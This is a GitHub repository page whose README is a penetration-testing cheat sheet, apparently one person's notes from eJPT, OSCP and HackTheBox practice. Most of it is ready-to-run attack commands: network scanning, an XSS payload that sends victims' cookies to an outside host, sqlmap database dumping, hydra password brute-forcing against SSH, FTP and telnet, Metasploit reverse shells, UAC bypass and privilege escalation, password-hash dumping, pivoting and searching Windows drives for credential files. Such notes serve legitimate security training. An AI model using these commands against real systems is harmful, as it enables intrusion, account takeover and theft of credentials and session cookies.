Skip to content
/ note-pentest Public

note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.

3 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Zerotistic/note-pentest

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits

README.md

README.md

 
 

Repository files navigation

pentest cheat sheet

note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.

nmap

nmap -sn ip/24 -oN discovery.nmap
cat discovery.nmap | grep "for" | cut -d " " -f 5 > ips.txt
nmap -sV -n -v -Pn -p- -T4 -iL ips.txt -A --open

add -O to find the OS

gobuster

gobuster -u 'url' -w /path/to/dir-list-med.txt
-U user
-P pass

mysql

connect
> mysql -u user -pPASS -h mysql_server --port=
see database
> show databases;
> use database_name;
see table
> show tables;
see content of tables
> SELECT * FROM accounts

use auxiliary/scanner/mssql/mssql_login
use auxiliary/admin/mssql/mssql_enum
--> xp_cmdshell is Enabled
--> remote access is Enabled
use exploit/windows/mssql/mssql_payload

xss

<script>new Image().src="http://192.168.99.11/get.php?a="+document.cookie;</script>

sqli

test for sqli with sqlmap
> sqlmap -u 'website/?id='
see tables
> sqlmap -u 'website' --tables
dump tables 
> sqlmap -u 'website/?id=vuln' --dump -T table_name

crack pass

SSH
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ssh://ip -v -I

FTP
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt ftp://ip -v -I

TELNET
hydra -L /home/nameless/Desktop/ctf/user.usr -P /home/nameless/Desktop/ctf/rockyou.txt telnet://ip -v -I

john file_to_crack

metasploit

search XXX
use XXX
show payload
show options

set payload windows ou linux/meterpreter/reverse_tcp

background = background current session
sessions -l 
sessions -i X

getuid
getsystem
-->IF IT FAILS
background
search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit
getuid
getsystem

shell

search -f fichier_recherche

hashdump (then johntheripper to crack)

ssh

to use id_rsa.pub

create ~/.ssh/id_rsa.pub
ssh -i ~/.ssh/id_rsa.pub user@ip
give pass

dns

null session

perl enum4linux -a <ip>
<20> --> file sharing, carry on

smbclient -L //<ip> -N

connect without pass
smblient //<ip>/SHARE_NAME -N

routing

ip route add subnet/24 via <ip>

1) background meterpreter session 
2) use post/multi/manage/autoroute 
3) set SESSION 1 
4) set SUBNET 172.16.50.0 
5) set CMD add 
6) run

find creds on windows

cd /

dir /s /b passwords.txt

dir /s /b credentials.txt

About

note of the different commands / informations received during my training for the eJPT, OSCP, and during CTF / box on hackthebox.

Topics

mysql ssh nmap penetration-testing metasploit gobuster

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published